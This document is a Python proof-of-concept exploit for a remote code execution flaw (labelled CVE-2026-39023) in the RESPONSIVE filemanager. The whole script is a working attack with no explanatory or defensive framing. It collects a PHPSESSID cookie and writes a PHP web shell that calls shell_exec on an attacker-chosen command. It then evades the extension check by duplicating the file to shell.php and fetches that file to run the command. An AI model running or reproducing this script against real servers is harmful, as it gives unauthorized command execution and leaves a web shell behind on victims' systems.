#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : POC_CVE-2026-39023.py
# Author             : Pierre_Adams
# Date created       : 02/04/2026


import requests
import argparse


def parse_args():
    parser = argparse.ArgumentParser(description="RCE Exploit RESPONSIVE filemanager CVE-2026-39023")
    parser.add_argument("-C", "--cookie")
    parser.add_argument("-c", "--command", required=True)
    parser.add_argument("-u", "--url", required=True)
    return parser.parse_args()


def build_payload(command):
    command = command.replace("'", "\\'")
    return f"""<?php
$output = shell_exec('{command}');
echo "$output";
?>"""


def get_cookie(session, cookie, url):
    if cookie:
        print(f"[>] Using cookie: {cookie}")
        return cookie

    print("[>] Collecting cookie...")
    session.get(f"{url}/filemanager/dialog.php")

    phpsessid = session.cookies.get("PHPSESSID")
    if not phpsessid:
        raise Exception("No PHPSESSID found")

    print(f"[>] Cookie collected: {phpsessid}")
    return phpsessid


def create_file(session, url, headers, payload):
    data = {
        "path": "",
        "name": "shell.",
        "new_content": payload
    }

    return session.post(
        f"{url}/filemanager/execute.php?action=create_file",
        headers=headers,
        data=data
    )


def delete_file(session, url, headers):
    data = {"path": "shell.", "name": ""}

    return session.post(
        f"{url}/filemanager/execute.php?action=delete_file",
        headers=headers,
        data=data
    )


def duplicate_file(session, url, headers):
    data = {"path": "shell.", "name": "shell.php"}

    return session.post(
        f"{url}/filemanager/execute.php?action=duplicate_file",
        headers=headers,
        data=data
    )


def main():
    args = parse_args()
    session = requests.Session()

    payload = build_payload(args.command)
    phpsessid = get_cookie(session, args.cookie, args.url)

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": f"PHPSESSID={phpsessid}"
    }

    print("[>] Creating file...")
    r = create_file(session, args.url, headers, payload)
    if "File successfully saved" in r.text:
        print("[>] File successfully saved")
    else:
        print(r.text)
        if "already existing" in r.text:
            print("[>] Deleting File...")
            delete_file(session, args.url, headers)
            print("[>] File successfully deleted")
            r = create_file(session, args.url, headers, payload)
            if "File successfully saved" in r.text:
                print("[>] File successfully saved")

    r = duplicate_file(session, args.url, headers)
    r = session.get(f"{args.url}/source/shell.php")
    print("[>] Response:\n")
    print(r.text)


if __name__ == "__main__":
    main()